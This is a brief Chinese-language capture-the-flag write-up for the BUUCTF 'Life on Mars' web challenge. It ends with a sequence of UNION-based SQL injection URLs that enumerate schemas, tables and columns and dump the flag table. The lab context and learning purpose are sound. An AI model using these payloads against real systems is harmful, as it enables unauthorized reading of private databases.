81，【5】BUUCTF WEB [b01lers2020]Life on Mars

进入靶场

怎莫颠颠的，一下子就想到展博了

先把左边的挨个点一遍

在最后一个有点收获

 不过也没其他收获了

这种进去给个正常网页的题目，基本都靠url获取信息了

抓包看看有没有其他信息

竟然没有任何信息

自闭了

看别人的wp去咯

为什么别人抓到的包里面有get传参的内容，我啥也没有，怎么点也没有

？？？？？？？

无所谓，我会自己加

query?search=hesperia_planum& 

直接无响应了

还少个cookie

F12也没得到

那就先看别人的wp吧，熟悉下传参的单词，字母也好

题目的原理是很简单的SQL注入，甚至没有什么过滤

/query?search=amazonis_planitia union select 1,database()

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

得到flag